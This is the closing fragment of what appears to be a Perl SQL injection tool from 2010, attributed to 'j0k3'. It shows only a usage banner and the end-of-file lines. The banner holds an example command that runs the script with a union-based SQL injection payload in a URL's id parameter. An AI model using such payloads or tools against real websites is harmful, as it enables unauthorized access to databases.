| $perl sql.pl -f http://seite.de/?id=-7+union+select |
| +1,j0k3 |
| |
| < j0k3 > |
+-------------------------------------------------------------+
}; exit;
}
# EOF - < j0k3 > - > 06.2010 - version 1.0